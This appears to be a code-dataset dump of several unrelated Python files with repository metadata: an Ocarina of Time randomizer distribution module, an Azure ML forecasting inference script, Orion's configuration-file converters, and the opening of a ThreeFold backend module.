target_parent = matched_target.parent_region.name
if matched_target.connected_region == None:
raise RuntimeError('Entrance leading to %s from %s is already shuffled in world %d' %
(target_region, target_parent, self.id + 1))
try:
check_entrances_compatibility(matched_entrance, matched_target)
change_connections(matched_entrance, matched_target)
validate_world(matched_entrance.world, worlds, None, locations_to_ensure_reachable, itempool)
except EntranceShuffleError as error:
raise RuntimeError('Cannot connect %s To %s in world %d (Reason: %s)' %
(matched_entrance, matched_entrance.connected_region or matched_target.connected_region, self.id + 1, error))
confirm_replacement(matched_entrance, matched_target)
if not entrance_found:
raise RuntimeError('Entrance does not belong to a pool of shuffled entrances in world %d: %s' % (self.id + 1, name))
def fill_bosses(self, world, prize_locs, prizepool):
count = 0
for (name, record) in pattern_dict_items(self.locations):
boss = pull_item_or_location([prize_locs], world, name)
if boss is None:
try:
location = LocationFactory(name)
except KeyError:
raise RuntimeError('Unknown boss in world %d: %s' % (world.id + 1, name))
if location.type == 'Boss':
raise RuntimeError('Boss or already placed in world %d: %s' % (world.id + 1, name))
else:
continue
if record.player is not None and (record.player - 1) != self.id:
raise RuntimeError('A boss can only give rewards in its own world')
reward = pull_item_or_location([prizepool], world, record.item)
if reward is None:
if IsItem(record.item):
raise RuntimeError('Reward already placed in world %d: %s' % (world.id + 1, record.item))
else:
raise RuntimeError('Reward unknown in world %d: %s' % (world.id + 1, record.item))
count += 1
world.push_item(boss, reward, True)
return count
def fill(self, window, worlds, location_pools, item_pools):
world = worlds[self.id]
for (location_name, record) in pattern_dict_items(self.locations):
if record.item is None:
continue
player_id = self.id if record.player is None else record.player - 1
location_matcher = lambda loc: loc.world.id == world.id and loc.name == location_name
location = pull_first_element(location_pools, location_matcher)
if location is None:
try:
location = LocationFactory(location_name)
except KeyError:
raise RuntimeError('Unknown location in world %d: %s' % (world.id + 1, name))
if location.type == 'Boss':
continue
elif location.name in world.disabled_locations:
continue
else:
raise RuntimeError('Location already filled in world %d: %s' % (self.id + 1, location_name))
if record.item == '#Junk' and location.type == 'Song' and not world.shuffle_song_items:
record.item = '#JunkSong'
try:
item = self.pool_remove_item(item_pools, record.item, 1, world_id=player_id)[0]
except KeyError:
try:
self.pool_remove_item(item_pools, "#Junk", 1, world_id=player_id)
item_matcher = lambda item: pattern_matcher(record.item)(item.name)
item = random.choice(list(ItemIterator(item_matcher, worlds[player_id])))
except KeyError:
raise RuntimeError('Too many items were added to world %d, and not enough junk is available to be removed.' % (self.id + 1))
if record.price is not None and item.type != 'Shop':
location.price = record.price
world.shop_prices[location.name] = record.price
if location.type == 'Song' and item.type != 'Song':
self.song_as_items = True
location.world.push_item(location, item, True)
if item.advancement:
playthrough = Playthrough.max_explore([world.state for world in worlds], itertools.chain.from_iterable(item_pools))
if not playthrough.can_beat_game(False):
raise FillError('%s in world %d is not reachable without %s in world %d!' % (location.name, self.id + 1, item.name, player_id + 1))
window.fillcount += 1
window.update_progress(5 + ((window.fillcount / window.locationcount) * 30))
def cloak(self, worlds, location_pools, model_pools):
for (name, record) in pattern_dict_items(self.locations):
if record.model is None:
continue
player_id = self.id if record.player is None else record.player - 1
world = worlds[player_id]
try:
location = LocationFactory(name)
except KeyError:
raise RuntimeError('Unknown location in world %d: %s' % (world.id + 1, name))
if location.type == 'Boss':
continue
location = pull_item_or_location(location_pools, world, name)
if location is None:
raise RuntimeError('Location already cloaked in world %d: %s' % (self.id + 1, name))
model = pull_item_or_location(model_pools, world, record.model, remove=False)
if model is None:
raise RuntimeError('Unknown model in world %d: %s' % (self.id + 1, record.model))
if can_cloak(location.item, model):
location.item.looks_like_item = model
def configure_gossip(self, spoiler, stoneIDs):
for (name, record) in pattern_dict_items(self.gossip_stones):
matcher = pattern_matcher(name)
stoneID = pull_random_element([stoneIDs], lambda id: matcher(gossipLocations[id].name))
if stoneID is None:
raise RuntimeError('Gossip stone unknown or already assigned in world %d: %s' % (self.id + 1, name))
spoiler.hints[self.id][stoneID] = GossipText(text=record.text, colors=record.colors, prefix='')
def give_item(self, item, count=1):
if item in self.starting_items:
self.starting_items[item].count += count
else:
self.starting_items[item] = StarterRecord(count)
def give_items(self, save_context):
for (name, record) in self.starting_items.items():
if record.count == 0:
continue
save_context.give_item(name, record.count)
def get_starting_item(self, item):
if item in self.starting_items:
return self.starting_items[item].count
else:
return 0
class Distribution(object):
def __init__(self, settings, src_dict={}):
self.settings = settings
self.world_dists = [WorldDistribution(self, id) for id in range(settings.world_count)]
self.update(src_dict, update_all=True)
# adds the location entry only if there is no record for that location already
def add_location(self, new_location, new_item):
for world_dist in self.world_dists:
try:
world_dist.add_location(new_location, new_item)
except KeyError:
print('Cannot place item at excluded location because it already has an item defined in the Distribution.')
def fill(self, window, worlds, location_pools, item_pools):
playthrough = Playthrough.max_explore([world.state for world in worlds], itertools.chain.from_iterable(item_pools))
if not playthrough.can_beat_game(False):
raise FillError('Item pool does not contain items required to beat game!')
for world_dist in self.world_dists:
world_dist.fill(window, worlds, location_pools, item_pools)
def cloak(self, worlds, location_pools, model_pools):
for world_dist in self.world_dists:
world_dist.cloak(worlds, location_pools, model_pools)
def configure_triforce_hunt(self, worlds):
total_count = 0
total_starting_count = 0
for world in worlds:
world.triforce_count = world.distribution.item_pool['Triforce Piece'].count
if 'Triforce Piece' in world.distribution.starting_items:
world.triforce_count += world.distribution.starting_items['Triforce Piece'].count
total_starting_count += world.distribution.starting_items['Triforce Piece'].count
total_count += world.triforce_count
if total_count < worlds[0].triforce_goal:
raise RuntimeError('Not enough Triforce Pieces in the worlds. There should be at least %d and there are only %d.' % (worlds[0].triforce_goal, total_count))
if total_starting_count >= worlds[0].triforce_goal:
raise RuntimeError('Too many Triforce Pieces in starting items. There should be at most %d and there are %d.' % (worlds[0].triforce_goal - 1, total_starting_count))
def update(self, src_dict, update_all=False):
update_dict = {
'file_hash': (src_dict.get('file_hash', []) + [None, None, None, None, None])[0:5],
'playthrough': None,
'entrance_playthrough': None,
'_settings': src_dict.get('settings', {}),
}
self.settings.__dict__.update(update_dict['_settings'])
if 'settings' in src_dict:
src_dict['_settings'] = src_dict['settings']
del src_dict['settings']
if update_all:
self.__dict__.update(update_dict)
for world in self.world_dists:
world.update({}, update_all=True)
else:
for k in src_dict:
setattr(self, k, update_dict[k])
for k in per_world_keys:
if k in src_dict:
for world_id, world in enumerate(self.world_dists):
world_key = 'World %d' % (world_id + 1)
if world_key in src_dict[k]:
world.update({k: src_dict[k][world_key]})
del src_dict[k][world_key]
for world in self.world_dists:
if src_dict[k]:
world.update({k: src_dict[k]})
def to_json(self, include_output=True, spoiler=True):
self_dict = {
':version': __version__,
'file_hash': CollapseList(self.file_hash),
':seed': self.settings.seed,
':settings_string': self.settings.settings_string,
'settings': self.settings.to_json(),
}
if spoiler:
world_dist_dicts = [world_dist.to_json() for world_dist in self.world_dists]
if self.settings.world_count > 1:
for k in per_world_keys:
self_dict[k] = {}
for id, world_dist_dict in enumerate(world_dist_dicts):
self_dict[k]['World %d' % (id + 1)] = world_dist_dict[k]
else:
self_dict.update({k: world_dist_dicts[0][k] for k in per_world_keys})
if self.playthrough is not None:
self_dict[':playthrough'] = AllignedDict({
sphere_nr: SortedDict({
name: record.to_json() for name, record in sphere.items()
})
for (sphere_nr, sphere) in self.playthrough.items()
}, depth=2)
if self.entrance_playthrough is not None and len(self.entrance_playthrough) > 0:
self_dict[':entrance_playthrough'] = AllignedDict({
sphere_nr: SortedDict({
name: record.to_json() for name, record in sphere.items()
})
for (sphere_nr, sphere) in self.entrance_playthrough.items()
}, depth=2)
if not include_output:
strip_output_only(self_dict)
self_dict['settings'] = dict(self._settings)
return self_dict
def to_str(self, include_output_only=True, spoiler=True):
return dump_obj(self.to_json(include_output_only, spoiler))
def __str__(self):
return dump_obj(self.to_json())
def update_spoiler(self, spoiler, output_spoiler):
self.file_hash = [HASH_ICONS[icon] for icon in spoiler.file_hash]
if not output_spoiler:
return
spoiler.parse_data()
for world in spoiler.worlds:
world_dist = self.world_dists[world.id]
world_dist.randomized_settings = {randomized_item: getattr(world, randomized_item) for randomized_item in world.randomized_list}
world_dist.dungeons = {dung: DungeonRecord({ 'mq': world.dungeon_mq[dung] }) for dung in world.dungeon_mq}
world_dist.trials = {trial: TrialRecord({ 'active': not world.skipped_trials[trial] }) for trial in world.skipped_trials}
world_dist.entrances = {ent.name: EntranceRecord.from_entrance(ent) for ent in spoiler.entrances[world.id]}
world_dist.locations = {loc: LocationRecord.from_item(item) for (loc, item) in spoiler.locations[world.id].items()}
world_dist.woth_locations = {loc.name: LocationRecord.from_item(loc.item) for loc in spoiler.required_locations[world.id]}
world_dist.barren_regions = [*world.empty_areas]
world_dist.gossip_stones = {gossipLocations[loc].name: GossipRecord(spoiler.hints[world.id][loc].to_json()) for loc in spoiler.hints[world.id]}
self.playthrough = {}
for (sphere_nr, sphere) in spoiler.playthrough.items():
loc_rec_sphere = {}
self.playthrough[sphere_nr] = loc_rec_sphere
for location in sphere:
if spoiler.settings.world_count > 1:
location_key = '%s [W%d]' % (location.name, location.world.id + 1)
else:
location_key = location.name
loc_rec_sphere[location_key] = LocationRecord.from_item(location.item)
self.entrance_playthrough = {}
for (sphere_nr, sphere) in spoiler.entrance_playthrough.items():
if len(sphere) > 0:
ent_rec_sphere = {}
self.entrance_playthrough[sphere_nr] = ent_rec_sphere
for entrance in sphere:
if spoiler.settings.world_count > 1:
entrance_key = '%s [W%d]' % (entrance.name, entrance.world.id + 1)
else:
entrance_key = entrance.name
ent_rec_sphere[entrance_key] = EntranceRecord.from_entrance(entrance)
@staticmethod
def from_file(settings, filename):
if any(map(filename.endswith, ['.z64', '.n64', '.v64'])):
raise InvalidFileException("Your Ocarina of Time ROM doesn't belong in the plandomizer setting. If you don't know what plandomizer is, or don't plan to use it, leave that setting blank and try again.")
try:
with open(filename) as infile:
src_dict = json.load(infile)
except json.decoder.JSONDecodeError as e:
raise InvalidFileException(f"Invalid Plandomizer File. Make sure the file is a valid JSON file. Failure reason: {str(e)}") from None
return Distribution(settings, src_dict)
def to_file(self, filename, output_spoiler):
json = self.to_str(spoiler=output_spoiler)
with open(filename, 'w') as outfile:
outfile.write(json)
def strip_output_only(obj):
if isinstance(obj, list):
for elem in obj:
strip_output_only(elem)
elif isinstance(obj, dict):
output_only_keys = [key for key in obj if is_output_only(key)]
for key in output_only_keys:
del obj[key]
for elem in obj.values():
strip_output_only(elem)
def can_cloak(actual_item, model):
return actual_item.index == 0x7C # Ice Trap
def is_output_only(pattern):
return pattern.startswith(':')
def is_pattern(pattern):
return pattern.startswith('!') or pattern.startswith('*') or pattern.startswith('#') or pattern.endswith('*')
def pattern_matcher(pattern):
if isinstance(pattern, list):
pattern_list = []
for pattern_item in enumerate(pattern):
pattern_list.append(pattern_matcher(pattern_item))
return reduce(lambda acc, sub_matcher: lambda item: sub_matcher(item) or acc(item), pattern_list, lambda: False)
invert = pattern.startswith('!')
if invert:
pattern = pattern[1:]
if pattern.startswith('#'):
group = search_groups[pattern[1:]]
return lambda s: invert != (s in group)
wildcard_begin = pattern.startswith('*')
if wildcard_begin:
pattern = pattern[1:]
wildcard_end = pattern.endswith('*')
if wildcard_end:
pattern = pattern[:-1]
if wildcard_begin:
return lambda s: invert != (pattern in s)
else:
return lambda s: invert != s.startswith(pattern)
else:
if wildcard_begin:
return lambda s: invert != s.endswith(pattern)
else:
return lambda s: invert != (s == pattern)
def pattern_dict_items(pattern_dict):
for (key, value) in pattern_dict.items():
if is_pattern(key):
pattern = lambda loc: pattern_matcher(key)(loc.name)
for location in LocationIterator(pattern):
yield(location.name, value)
else:
yield (key, value)
def pull_first_element(pools, predicate=lambda k:True, remove=True):
for pool in pools:
for element in pool:
if predicate(element):
if remove:
pool.remove(element)
return element
return None
def pull_random_element(pools, predicate=lambda k:True, remove=True):
candidates = [(element, pool) for pool in pools for element in pool if predicate(element)]
if len(candidates) == 0:
return None
element, pool = random.choice(candidates)
if remove:
pool.remove(element)
return element
def pull_all_elements(pools, predicate=lambda k:True, remove=True):
elements = []
for pool in pools:
for element in pool:
if predicate(element):
if remove:
pool.remove(element)
elements.append(element)
if len(elements) == 0:
return None
return elements
# Finds and removes (unless told not to do so) an item or location matching the criteria from a list of pools.
def pull_item_or_location(pools, world, name, remove=True):
if is_pattern(name):
matcher = pattern_matcher(name)
return pull_random_element(pools, lambda e: e.world is world and matcher(e.name), remove)
else:
return pull_first_element(pools, lambda e: e.world is world and e.name == name, remove)
| 40.833693
| 213
| 0.595843
|
6b2fc926268e267e0d7700d1b46266abb44556a0
| 11,712
|
py
|
Python
|
how-to-use-azureml/automated-machine-learning/forecasting-beer-remote/infer.py
|
rigidz/https-github.com-Azure-MachineLearningNotebooks
|
8f2fa913209c21498fa67e08394bace12b47e2a4
|
[
"MIT"
] | 2
|
2019-05-03T20:20:39.000Z
|
2019-05-05T17:54:43.000Z
|
how-to-use-azureml/automated-machine-learning/forecasting-beer-remote/infer.py
|
rigidz/https-github.com-Azure-MachineLearningNotebooks
|
8f2fa913209c21498fa67e08394bace12b47e2a4
|
[
"MIT"
] | null | null | null |
how-to-use-azureml/automated-machine-learning/forecasting-beer-remote/infer.py
|
rigidz/https-github.com-Azure-MachineLearningNotebooks
|
8f2fa913209c21498fa67e08394bace12b47e2a4
|
[
"MIT"
] | 5
|
2019-05-03T20:20:53.000Z
|
2019-05-04T13:01:49.000Z
|
import pandas as pd
import numpy as np
import argparse
from azureml.core import Run
from sklearn.externals import joblib
from sklearn.metrics import mean_absolute_error, mean_squared_error
from azureml.automl.core._vendor.automl.client.core.common import metrics
from automl.client.core.common import constants
from pandas.tseries.frequencies import to_offset
def align_outputs(y_predicted, X_trans, X_test, y_test,
predicted_column_name='predicted',
horizon_colname='horizon_origin'):
"""
Demonstrates how to get the output aligned to the inputs
using pandas indexes. Helps understand what happened if
the output's shape differs from the input shape, or if
the data got re-sorted by time and grain during forecasting.
Typical causes of misalignment are:
* we predicted some periods that were missing in actuals -> drop from eval
* model was asked to predict past max_horizon -> increase max horizon
* data at start of X_test was needed for lags -> provide previous periods
"""
if (horizon_colname in X_trans):
df_fcst = pd.DataFrame({predicted_column_name: y_predicted,
horizon_colname: X_trans[horizon_colname]})
else:
df_fcst = pd.DataFrame({predicted_column_name: y_predicted})
# y and X outputs are aligned by forecast() function contract
df_fcst.index = X_trans.index
# align original X_test to y_test
X_test_full = X_test.copy()
X_test_full[target_column_name] = y_test
# X_test_full's index does not include origin, so reset for merge
df_fcst.reset_index(inplace=True)
X_test_full = X_test_full.reset_index().drop(columns='index')
together = df_fcst.merge(X_test_full, how='right')
# drop rows where prediction or actuals are nan
# happens because of missing actuals
# or at edges of time due to lags/rolling windows
clean = together[together[[target_column_name,
predicted_column_name]].notnull().all(axis=1)]
return(clean)
def do_rolling_forecast_with_lookback(fitted_model, X_test, y_test,
max_horizon, X_lookback, y_lookback,
freq='D'):
"""
Produce forecasts on a rolling origin over the given test set.
Each iteration makes a forecast for the next 'max_horizon' periods
with respect to the current origin, then advances the origin by the
horizon time duration. The prediction context for each forecast is set so
that the forecaster uses the actual target values prior to the current
origin time for constructing lag features.
This function returns a concatenated DataFrame of rolling forecasts.
"""
print("Using lookback of size: ", y_lookback.size)
df_list = []
origin_time = X_test[time_column_name].min()
X = X_lookback.append(X_test)
y = np.concatenate((y_lookback, y_test), axis=0)
while origin_time <= X_test[time_column_name].max():
# Set the horizon time - end date of the forecast
horizon_time = origin_time + max_horizon * to_offset(freq)
# Extract test data from an expanding window up-to the horizon
expand_wind = (X[time_column_name] < horizon_time)
X_test_expand = X[expand_wind]
y_query_expand = np.zeros(len(X_test_expand)).astype(np.float)
y_query_expand.fill(np.NaN)
if origin_time != X[time_column_name].min():
# Set the context by including actuals up-to the origin time
test_context_expand_wind = (X[time_column_name] < origin_time)
context_expand_wind = (
X_test_expand[time_column_name] < origin_time)
y_query_expand[context_expand_wind] = y[test_context_expand_wind]
# Print some debug info
print("Horizon_time:", horizon_time,
" origin_time: ", origin_time,
" max_horizon: ", max_horizon,
" freq: ", freq)
print("expand_wind: ", expand_wind)
print("y_query_expand")
print(y_query_expand)
print("X_test")
print(X)
print("X_test_expand")
print(X_test_expand)
print("Type of X_test_expand: ", type(X_test_expand))
print("Type of y_query_expand: ", type(y_query_expand))
print("y_query_expand")
print(y_query_expand)
# Make a forecast out to the maximum horizon
# y_fcst, X_trans = y_query_expand, X_test_expand
y_fcst, X_trans = fitted_model.forecast(X_test_expand, y_query_expand)
print("y_fcst")
print(y_fcst)
# Align forecast with test set for dates within
# the current rolling window
trans_tindex = X_trans.index.get_level_values(time_column_name)
trans_roll_wind = (trans_tindex >= origin_time) & (
trans_tindex < horizon_time)
test_roll_wind = expand_wind & (X[time_column_name] >= origin_time)
df_list.append(align_outputs(
y_fcst[trans_roll_wind], X_trans[trans_roll_wind],
X[test_roll_wind], y[test_roll_wind]))
# Advance the origin time
origin_time = horizon_time
return pd.concat(df_list, ignore_index=True)
def do_rolling_forecast(fitted_model, X_test, y_test, max_horizon, freq='D'):
"""
Produce forecasts on a rolling origin over the given test set.
Each iteration makes a forecast for the next 'max_horizon' periods
with respect to the current origin, then advances the origin by the
horizon time duration. The prediction context for each forecast is set so
that the forecaster uses the actual target values prior to the current
origin time for constructing lag features.
This function returns a concatenated DataFrame of rolling forecasts.
"""
df_list = []
origin_time = X_test[time_column_name].min()
while origin_time <= X_test[time_column_name].max():
# Set the horizon time - end date of the forecast
horizon_time = origin_time + max_horizon * to_offset(freq)
# Extract test data from an expanding window up-to the horizon
expand_wind = (X_test[time_column_name] < horizon_time)
X_test_expand = X_test[expand_wind]
y_query_expand = np.zeros(len(X_test_expand)).astype(np.float)
y_query_expand.fill(np.NaN)
if origin_time != X_test[time_column_name].min():
# Set the context by including actuals up-to the origin time
test_context_expand_wind = (X_test[time_column_name] < origin_time)
context_expand_wind = (
X_test_expand[time_column_name] < origin_time)
y_query_expand[context_expand_wind] = y_test[
test_context_expand_wind]
# Print some debug info
print("Horizon_time:", horizon_time,
" origin_time: ", origin_time,
" max_horizon: ", max_horizon,
" freq: ", freq)
print("expand_wind: ", expand_wind)
print("y_query_expand")
print(y_query_expand)
print("X_test")
print(X_test)
print("X_test_expand")
print(X_test_expand)
print("Type of X_test_expand: ", type(X_test_expand))
print("Type of y_query_expand: ", type(y_query_expand))
print("y_query_expand")
print(y_query_expand)
# Make a forecast out to the maximum horizon
y_fcst, X_trans = fitted_model.forecast(X_test_expand, y_query_expand)
print("y_fcst")
print(y_fcst)
# Align forecast with test set for dates within the
# current rolling window
trans_tindex = X_trans.index.get_level_values(time_column_name)
trans_roll_wind = (trans_tindex >= origin_time) & (
trans_tindex < horizon_time)
test_roll_wind = expand_wind & (
X_test[time_column_name] >= origin_time)
df_list.append(align_outputs(y_fcst[trans_roll_wind],
X_trans[trans_roll_wind],
X_test[test_roll_wind],
y_test[test_roll_wind]))
# Advance the origin time
origin_time = horizon_time
return pd.concat(df_list, ignore_index=True)
def APE(actual, pred):
"""
Calculate absolute percentage error.
Returns a vector of APE values with same length as actual/pred.
"""
return 100 * np.abs((actual - pred) / actual)
def MAPE(actual, pred):
"""
Calculate mean absolute percentage error.
Remove NA and values where actual is close to zero
"""
not_na = ~(np.isnan(actual) | np.isnan(pred))
not_zero = ~np.isclose(actual, 0.0)
actual_safe = actual[not_na & not_zero]
pred_safe = pred[not_na & not_zero]
return np.mean(APE(actual_safe, pred_safe))
parser = argparse.ArgumentParser()
parser.add_argument(
'--max_horizon', type=int, dest='max_horizon',
default=10, help='Max Horizon for forecasting')
parser.add_argument(
'--target_column_name', type=str, dest='target_column_name',
help='Target Column Name')
parser.add_argument(
'--time_column_name', type=str, dest='time_column_name',
help='Time Column Name')
parser.add_argument(
'--frequency', type=str, dest='freq',
help='Frequency of prediction')
args = parser.parse_args()
max_horizon = args.max_horizon
target_column_name = args.target_column_name
time_column_name = args.time_column_name
freq = args.freq
print('args passed are: ')
print(max_horizon)
print(target_column_name)
print(time_column_name)
print(freq)
run = Run.get_context()
# get input dataset by name
test_dataset = run.input_datasets['test_data']
lookback_dataset = run.input_datasets['lookback_data']
grain_column_names = []
df = test_dataset.to_pandas_dataframe()
print('Read df')
print(df)
X_test_df = test_dataset.drop_columns(columns=[target_column_name])
y_test_df = test_dataset.with_timestamp_columns(
None).keep_columns(columns=[target_column_name])
X_lookback_df = lookback_dataset.drop_columns(columns=[target_column_name])
y_lookback_df = lookback_dataset.with_timestamp_columns(
None).keep_columns(columns=[target_column_name])
fitted_model = joblib.load('model.pkl')
if hasattr(fitted_model, 'get_lookback'):
lookback = fitted_model.get_lookback()
df_all = do_rolling_forecast_with_lookback(
fitted_model,
X_test_df.to_pandas_dataframe(),
y_test_df.to_pandas_dataframe().values.T[0],
max_horizon,
X_lookback_df.to_pandas_dataframe()[-lookback:],
y_lookback_df.to_pandas_dataframe().values.T[0][-lookback:],
freq)
else:
df_all = do_rolling_forecast(
fitted_model,
X_test_df.to_pandas_dataframe(),
y_test_df.to_pandas_dataframe().values.T[0],
max_horizon,
freq)
print(df_all)
print("target values:::")
print(df_all[target_column_name])
print("predicted values:::")
print(df_all['predicted'])
# use automl metrics module
scores = metrics.compute_metrics_regression(
df_all['predicted'],
df_all[target_column_name],
list(constants.Metric.SCALAR_REGRESSION_SET),
None, None, None)
print("scores:")
print(scores)
for key, value in scores.items():
run.log(key, value)
print("Simple forecasting model")
rmse = np.sqrt(mean_squared_error(
df_all[target_column_name], df_all['predicted']))
print("[Test Data] \nRoot Mean squared error: %.2f" % rmse)
mae = mean_absolute_error(df_all[target_column_name], df_all['predicted'])
print('mean_absolute_error score: %.2f' % mae)
print('MAPE: %.2f' % MAPE(df_all[target_column_name], df_all['predicted']))
run.log('rmse', rmse)
run.log('mae', mae)
| 36.6
| 79
| 0.683145
|
139ddfda1eb0e72680be2a4207e57dda1829da6d
| 8,857
|
py
|
Python
|
src/orion/core/io/convert.py
|
mnoukhov/orion
|
7849d77344e84ec805207cf4148aecf6f7d6b3d7
|
[
"BSD-3-Clause"
] | 3
|
2019-12-13T03:41:19.000Z
|
2021-06-15T20:14:33.000Z
|
src/orion/core/io/convert.py
|
mnoukhov/orion
|
7849d77344e84ec805207cf4148aecf6f7d6b3d7
|
[
"BSD-3-Clause"
] | null | null | null |
src/orion/core/io/convert.py
|
mnoukhov/orion
|
7849d77344e84ec805207cf4148aecf6f7d6b3d7
|
[
"BSD-3-Clause"
] | null | null | null |
# -*- coding: utf-8 -*-
"""
:mod:`orion.core.worker.convert` -- Parse and generate user script's configuration
==================================================================================
.. module:: convert
:platform: Unix
:synopsis: Defines and instantiates a converter for configuration file types.
Given a file path infer which configuration file parser/emitter it corresponds to.
Define `Converter` classes with a common interface for many popular configuration
file types.
Currently supported:
- YAML
- JSON
- See below, for configuration agnostic parsing
A `GenericConverter` is provided that tries and parses configuration
files, regardless of their type, according to predefined Oríon's markers.
"""
from abc import (ABC, abstractmethod)
from collections import (defaultdict, deque)
import importlib
import os
from orion.core.utils import (Factory, nesteddict)
def infer_converter_from_file_type(config_path,
regex=None, default_keyword=''):
"""Use filetype extension to infer and build the correct configuration file
converter.
"""
_, ext_type = os.path.splitext(os.path.abspath(config_path))
for klass in Converter.types:
if ext_type in klass.file_extensions:
return klass()
if regex is None:
return GenericConverter(expression_prefix=default_keyword)
return GenericConverter(regex, expression_prefix=default_keyword)
class BaseConverter(ABC):
"""Base class for configuration parsers/generators.
Attributes
----------
file_extensions : list of strings
Strings starting with '.' which identify usually a file type as a
common convention. For instance, ``['.yml', '.yaml']`` for YAML files.
"""
file_extensions = []
@abstractmethod
def parse(self, filepath):
"""Read dictionary out of the configuration file.
Parameters
----------
filepath : str
Full path to the original user script's configuration.
"""
pass
@abstractmethod
def generate(self, filepath, data):
"""Create a configuration file at `filepath` using dictionary `data`."""
pass
class YAMLConverter(BaseConverter):
"""Converter for YAML files."""
file_extensions = ['.yml', '.yaml']
def __init__(self):
"""Try to dynamically import yaml module."""
self.yaml = importlib.import_module('yaml')
def parse(self, filepath):
"""Read dictionary out of the configuration file.
Parameters
----------
file : str
Full path to the original user script's configuration.
"""
with open(filepath) as f:
return self.yaml.safe_load(stream=f)
def generate(self, filepath, data):
"""Create a configuration file at `filepath` using dictionary `data`."""
with open(filepath, 'w') as f:
self.yaml.dump(data, stream=f)
class JSONConverter(BaseConverter):
"""Converter for JSON files."""
file_extensions = ['.json']
def __init__(self):
"""Try to dynamically import json module."""
self.json = importlib.import_module('json')
def parse(self, filepath):
"""Read dictionary out of the configuration file.
Parameters
----------
file : str
Full path to the original user script's configuration.
"""
with open(filepath) as f:
return self.json.load(f)
def generate(self, filepath, data):
"""Create a configuration file at `filepath` using dictionary `data`."""
with open(filepath, 'w') as f:
self.json.dump(data, f)
class GenericConverter(BaseConverter):
"""Generic converter for any configuration file type.
For each parameter dimension declared here, one must necessarily
provide a ``name`` keyword inside the `Dimension` building expression.
Implementation details: As this class is supposed to provide with a
generic text parser, semantics are going to be tied to their consequent
usage. A template document is going to be created on `parse` and filled
with values on `read`. This template document consists the state of this
`Converter` object.
Dimension should be defined for instance as:
``meaningful_name~uniform(0, 4)``
"""
def __init__(self, regex=r'([\/]?[\w|\/|-]+)~([\+]?.*\)|\-|\>[A-Za-z_]\w*)',
expression_prefix=''):
"""Initialize with the regex expression which will be searched for
to define a `Dimension`.
"""
self.re_module = importlib.import_module('re')
self.regex = self.re_module.compile(regex)
self.expression_prefix = expression_prefix
self.template = None
self.has_leading = defaultdict(str)
self.conflict_msg = "Namespace conflict in configuration file '{}', under '{}'"
def _raise_conflict(self, path, namespace):
raise ValueError(self.conflict_msg.format(path, namespace))
def parse(self, filepath):
r"""Read dictionary out of the configuration file.
Create a template for Python 3 string format and save it as this
object's state, by substituing '{\1}' wherever the pattern
was matched. By default, the first matched group (\1) corresponds
with a dimension's namespace.
.. note:: Namespace in substitution templates does not contain the first '/'.
Parameters
----------
filepath : str
Full path to the original user script's configuration.
"""
with open(filepath) as f:
self.template = f.read()
# Search for Oríon semantic pattern
pairs = self.regex.findall(self.template)
ret = dict(pairs)
# Every namespace given should be unique,
# raise conflict if there are duplicates
if len(pairs) != len(ret):
namespaces = list(zip(*pairs))[0]
for name in namespaces:
if namespaces.count(name) != 1:
self._raise_conflict(filepath, name)
# Create template using each namespace as format key,
# exactly as provided by the user
subst = self.re_module.sub(r'{', r'{{', self.template)
subst = self.re_module.sub(r'}', r'}}', subst)
substituted, num_subs = self.regex.subn(r'{\1!s}', subst)
assert len(ret) == num_subs, "This means an error in the regex. Report bug. Details::\n"\
"original: {}\n, regex:{}".format(self.template, self.regex)
self.template = substituted
# Wrap it in style of what the rest of `Converter`s return
ret_nested = nesteddict()
for namespace, expression in ret.items():
keys = namespace.split('/')
if not keys[0]: # It means that user wrote a namespace starting from '/'
keys = keys[1:] # Safe because of the regex pattern
self.has_leading[namespace[1:]] = '/'
stuff = ret_nested
for i, key in enumerate(keys[:-1]):
stuff = stuff[key]
if isinstance(stuff, str):
# If `stuff` is not a dictionary while traversing the
# namespace path, then this amounts to a conflict which was
# not sufficiently get caught
self._raise_conflict(filepath, '/'.join(keys[:i + 1]))
# If final value is already filled,
# then this must be also due to a conflict
if stuff[keys[-1]]:
self._raise_conflict(filepath, namespace)
# Keep compatibility with `SpaceBuilder._build_from_config`
stuff[keys[-1]] = self.expression_prefix + expression
return ret_nested
def generate(self, filepath, data):
"""Create a configuration file at `filepath` using dictionary `data`."""
unnested_data = dict()
stack = deque()
stack.append(([], data))
while True:
try:
namespace, stuff = stack.pop()
except IndexError:
break
if isinstance(stuff, dict):
for k, v in stuff.items():
stack.append((['/'.join(namespace + [str(k)])], v))
else:
name = namespace[0]
unnested_data[self.has_leading[name] + name] = stuff
document = self.template.format(**unnested_data)
with open(filepath, 'w') as f:
f.write(document)
# pylint: disable=too-few-public-methods,abstract-method
class Converter(BaseConverter, metaclass=Factory):
"""Class used to inject dependency on a configuration file parser/generator.
.. seealso:: `Factory` metaclass and `BaseConverter` interface.
"""
pass
| 33.934866
| 97
| 0.612284
|
ad30bfa1c19b1e9d432e2e6eac4f6d7369e46e29
| 2,956
|
py
|
Python
|
plugins/tff_backend/bizz/todo/__init__.py
|
threefoldfoundation/app_backend
|
b3cea2a3ff9e10efcc90d3d6e5e8e46b9e84312a
|
[
"Apache-2.0"
] | null | null | null |
plugins/tff_backend/bizz/todo/__init__.py
|
threefoldfoundation/app_backend
|
b3cea2a3ff9e10efcc90d3d6e5e8e46b9e84312a
|
[
"Apache-2.0"
] | 178
|
2017-08-02T12:58:06.000Z
|
2017-12-20T15:01:12.000Z
|
plugins/tff_backend/bizz/todo/__init__.py
|
threefoldfoundation/app_backend
|
b3cea2a3ff9e10efcc90d3d6e5e8e46b9e84312a
|
[
"Apache-2.0"
] | 2
|
2018-01-10T10:43:12.000Z
|
2018-03-18T10:42:23.000Z
|
# -*- coding: utf-8 -*-
# Copyright 2017 GIG Technology NV
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# @@license_version:1.3@@
from mcfw.rpc import returns, arguments
from plugins.rogerthat_api.api import system
from plugins.tff_backend.bizz import get_tf_token_api_key
from plugins.tff_backend.bizz.rogerthat import put_user_data
from plugins.tff_backend.bizz.todo.hoster import HosterSteps
from plugins.tff_backend.bizz.todo.investor import InvestorSteps
# The 'todo list' functionality is currently not used - consider removing it
@returns()
@arguments(email=unicode, app_id=unicode, step=unicode)
